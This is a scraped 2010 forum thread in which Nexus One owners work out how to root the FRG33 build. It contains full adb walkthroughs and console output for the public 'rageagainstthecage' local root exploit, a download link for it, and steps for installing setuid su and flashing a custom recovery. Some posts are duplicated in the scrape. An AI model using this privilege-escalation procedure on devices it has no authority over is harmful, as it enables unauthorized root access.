is there yet a proven way to root 33? Ive searched this site and thru google with no clear findings. I didnt want ot unlock my bootloader but i am so sick of 33 that now I want to do it but i dont want to just jump on board one of the methods if ill jack up my phone. The above instructions are really confusing, but they havent been confirmed either as i understand it. Thanks for any help, i cant get rid of 33 quick enough...
[ROM] Passion_Google_WWE_2.16.1700.1_FRG33_MFG_Shipment_ ROM
- Thread starter LlabTooFeR
- Start date
Very interesting, thank you! I assume this is largely same exploit that was originally published here:
http://xdaforums.com/showthread.php?t=736271
which has had various names applied to the individual files - freenexus, rageagainstthecage, exploid.
I had always assumed that the one-click root relied on exactly the same vulnerability as the "exploid" method. But perhaps FRG33 breaks only the 1-click and not the manual method?
Code:
F:\ADB>adb push rageagainstthecage-arm5.bin /data/local/tmp/rageagainstthecage
263 KB/s (5392 bytes in 0.020s)
F:\ADB>adb shell chmod 700 /data/local/tmp/rageagainstthecage
F:\ADB>adb shell
$ cd /data/local/tmp
cd /data/local/tmp
$ ./rageagainstthecage
./rageagainstthecage
[*] CVE-2010-EASY Android local root exploit (C) 2010 by 743C
[*] checking NPROC limit ...
[+] RLIMIT_NPROC={3084, 3084}
[*] Searching for adb ...
[+] Found adb as PID 64
[*] Spawning children. Dont type anything and wait for reset!
[*]
[*] If you like what we are doing you can send us PayPal money to
[*] 7-4-3-C[at]web.de so we can compensate time, effort and HW costs.
[*] If you are a company and feel like you profit from our work,
[*] we also accept donations > 1000 USD!
[*]
[*] adb connection will be reset. restart adb server on desktop and re-login.
$
F:\ADB>adb kill-server
F:\ADB>adb start-server
* daemon not running. starting it now *
* daemon started successfully *
F:\ADB>adb shell
#
Last edited:
Okay so this gives you a root shell... but you don't have superuser and su loaded yet right? So I suggest taking a look at these instructions:
http://xdaforums.com/showthread.php?t=736271
with recognition that some file locations will be different because you're using a different version of the exploit. Your aim is to end up with busybox, su and superuser.apk in all the right places with all the right permissions.
If you can do this - you should then be able to run ROM Manager and grant it root access. Flash ClockworkMod recovery. If you had a nandroid backup from pre-upgrade, restore to it now. If you didn't have such a backup, then in ROM Manager go to Download ROM > Stock Images > Nexus One FRF91, pick the rooted or stock option.
Let us know how it goes and what you had to do... maybe someone who's more Linuxy can clarify this better =)
i unlocked, rooted, flashed custom recovery. anytime i try to flash a rom or just stock frf 91, in recovery i get:
Welcome to CyanogenMod-6.0.0-N1!
assert failed: getprop ("ro.bootloader") == ".33.2012: and so on...
i found something about hboot when i searched but i still dont understand. i unlocked and rooted to get rid of 33, anyone know what im doing wrong? thanks
Welcome to CyanogenMod-6.0.0-N1!
assert failed: getprop ("ro.bootloader") == ".33.2012: and so on...
i found something about hboot when i searched but i still dont understand. i unlocked and rooted to get rid of 33, anyone know what im doing wrong? thanks
Last edited:
Yes !!! I did it. 
, I now have Ra-nexus-v1.8.0 as my recovery
HUGE PROPS to stfl for finding exploit, and cmstlist for direction
Basically i followed the instrucions stfl posted, but it dosent always work, just keep trying it will, i had to repeat it 3 times.
then did the steps in this thread http://xdaforums.com/showthread.php?t=736271
DO NOT POWER OFF PHONE DURING ANY STEPS OTHERWISE YOU WILL HAVE TO START AGAIN
, I now have Ra-nexus-v1.8.0 as my recoveryHUGE PROPS to stfl for finding exploit, and cmstlist for direction
Basically i followed the instrucions stfl posted, but it dosent always work, just keep trying it will, i had to repeat it 3 times.
Code:
F:\ADB>adb push rageagainstthecage-arm5.bin /data/local/tmp/rageagainstthecage
263 KB/s (5392 bytes in 0.020s)
F:\ADB>adb shell chmod 700 /data/local/tmp/rageagainstthecage
F:\ADB>adb shell
$ cd /data/local/tmp
cd /data/local/tmp
$ ./rageagainstthecage
./rageagainstthecage[*] CVE-2010-EASY Android local root exploit (C) 2010 by 743C
[*] checking NPROC limit ...
[+] RLIMIT_NPROC={3084, 3084}[*] Searching for adb ...
[+] Found adb as PID 64[*] Spawning children. Dont type anything and wait for reset![*][*] If you like what we are doing you can send us PayPal money to[*] 7-4-3-C[at]web.de so we can compensate time, effort and HW costs.[*] If you are a company and feel like you profit from our work,[*] we also accept donations > 1000 USD![*][*] adb connection will be reset. restart adb server on desktop and re-login.
$
F:\ADB>adb kill-server
F:\ADB>adb start-server
* daemon not running. starting it now *
* daemon started successfully *
F:\ADB>adb shell
#then did the steps in this thread http://xdaforums.com/showthread.php?t=736271
Code:
1. run freenexus.bat
2. adb shell
3. cd /data/local/tmp
4. ./freenexus ( i didnt bother toggling wifi ) it will hang and youll have to maunally close that command box and open a new one
5. C:\Users\Administrator>f:
F:\>cd adb
F:\ADB>adb shell
# cd /data/local/tmp
cd /data/local/tmp
# ./busybox cp busybox /system/bin
./busybox cp busybox /system/bin
# chmod 4755 /system/bin/busybox
chmod 4755 /system/bin/busybox
# busybox cp Superuser.apk /system/app
busybox cp Superuser.apk /system/app
# busybox cp su /system/bin
busybox cp su /system/bin
# chmod 4755 /system/bin/su
chmod 4755 /system/bin/su
# exit
exit
F:\ADB>adb shell
# su
su
# exit
exit
F:\ADB>adb push flash_image /data/local/tmp/flash_image
873 KB/s (76044 bytes in 0.085s)
F:\ADB>adb shell
# su
su
# mount -o rw,remount /dev/block/mtdblock /system
mount -o rw,remount /dev/block/mtdblock /system
# cd /data/local/tmp
cd /data/local/tmp
# chmod 755 flash_image
chmod 755 flash_image
# ./flash_image recovery /sdcard/recovery.img
./flash_image recovery /sdcard/recovery.img
#
F:\ADB>#DO NOT POWER OFF PHONE DURING ANY STEPS OTHERWISE YOU WILL HAVE TO START AGAIN
Last edited:
Nice, I'm glad you managed to get custom recovery! Were you able to revert successfully to an earlier build?
Yes, you are correct. The 1-click author said he only used exploid(wifi exploit) method and he may add the rageagainstthecage(adb spwaning exploit) method some other day.
That's why 1-click root doesn't work on FRG33; only the manual method applies to FRG33 right now.
Interesting to know these details, thanks. On one hand it would be very useful to have the latter method in a 1-click root; on the other hand, Google will probably patch that one up in a future build anyways so it may be short-lived =)
thanks, i did take a look at that, its pretty intimidating so i was hoping for an easier solution. Oh well, ive come this far, and i need those damned protected apps so ill see what i can do with those instructions.
Im also wondering if i could just flash the froyo radio? Would that bring along that older spl? I asked in another thread but the reply was a bit confusing, he said "not unless i use passimg" which seems simple enough to me, i just need to find the zip, i could only find the .img and im not sure if i can convert it. But that same reply indicated that if i dont use passimg, "radio will only touch radio, especially if i use fastboot", but i thought passimg would have to be thru fastboot wouldnt it?
The Kradio isnt working for me anyway so i want the froyo radio back, so if i could flash that in a way to also get the hboot that would be awesome.
Im asking a thousand questions because i cant afford to jack my phone up, and so far, the only thing about this that resembles my days of messing with the g1 are the terminal commands, lots of new ground for me to cover here. thanks for the help, im awfully close
Edit: flashed 91 radio successfully, it wouldnt passimg so i just flashed the zip from recovery, but hboot is still 35.0017
Last edited:
I'm not really that knowlegdeable about android stuff, but I'm sure the only way back to 0.33.0012 is by following those steps in the revert HBOOT thread,
yeah i ended up following those (tried to anyway), got all the files downloaded and modified but cant get terminal to recognize my device. This is tough but its good practice. Maybe when its all said and done i can be glad i flashed this god forsaken 33
im at the same spot. I rooted and had to setup usb, AndroidSDK, and Fastboot, but when i do the terminal commands in the revert thread, it says it doesnt recognize the device. I looked at the thread about adb commands, but between that and a ton of google searches i cant find anything about initial steps to access the phone, to make it recognize the phone. the phone says fastboot usb in red, and terminal responds it doesnt recognize the device im sure i have the files in the right place, im typing in the correct commands. ive just done so much searching, and ive followed the instructions so closely. I cant think of anything else to try or anything else to search for
Last edited:
I have successfully reverted back to HBOOT-0.33.0012
I used this rom after I achieved root http://xdaforums.com/showthread.php?t=714184
Then followed steps in this thread http://xdaforums.com/showthread.php?t=726258
I used this rom after I achieved root http://xdaforums.com/showthread.php?t=714184
Then followed steps in this thread http://xdaforums.com/showthread.php?t=726258
I have successfully reverted back to HBOOT-0.33.0012
I used this rom after I achieved root http://xdaforums.com/showthread.php?t=714184
Then followed steps in this thread http://xdaforums.com/showthread.php?t=726258
thanks for this, the rom works great. Somehow I missed that there was a 33 rom around. Im working through the same revert thread you used but I still cant get my "device detected" in terminal to finish it. But now that ive got this rom im in no hurry, paid apps are working fine, thanks again!
Similar threads
Top Liked Posts
-
There are no posts matching your filters.
-
2Here brand new RUU for Nexus One
http://shipped-roms.com/shipped/Pas...le_WWE_2.16.1700.1_FRG33_MFG_Shipment_ROM.zip
Enjoy!1My friend's new nexus one is already FRG33 as it arrived, there is no way to use 1-click root.
I've tried to use new exploit from C skills and it did show "#". So I think it should do the trick.
I doesn't flash anything yet, therefore, this is for your reference.
C skills: h ttp://c-skills.blogspot.com/2010/08/please-hold-line.html
1. Get the exploit (executable file)
exploit: h ttp://stealth.openwall.net/xSports/RageAgainstTheCage.tgz
2. Extract the .tgz file to get the "rageagainstthecage-arm5.bin"
I put the file in d:\RageAgainstTheCage
3. Put exploit file to your N1
adb push d:\RageAgainstTheCage\rageagainstthecage-arm5.bin /data/local/tmp/rageagainstthecage
adb shell chmod 700 /data/local/tmp/rageagainstthecage
4. Enter adb shell
adb shell
5. Execute exploit (It will automatically close adb shell)
$cd /data/local/tmp
$./rageagainstthecage
6. Restart adb
adb kill-server
adb start-server
7. Enter adb shell again
# (Yes, my lord.)
I've found it may not success every time, if it doesn't, please go through steps 4~7 again.
If it still doesn't work, we need to wait a new way to root. Good luck.
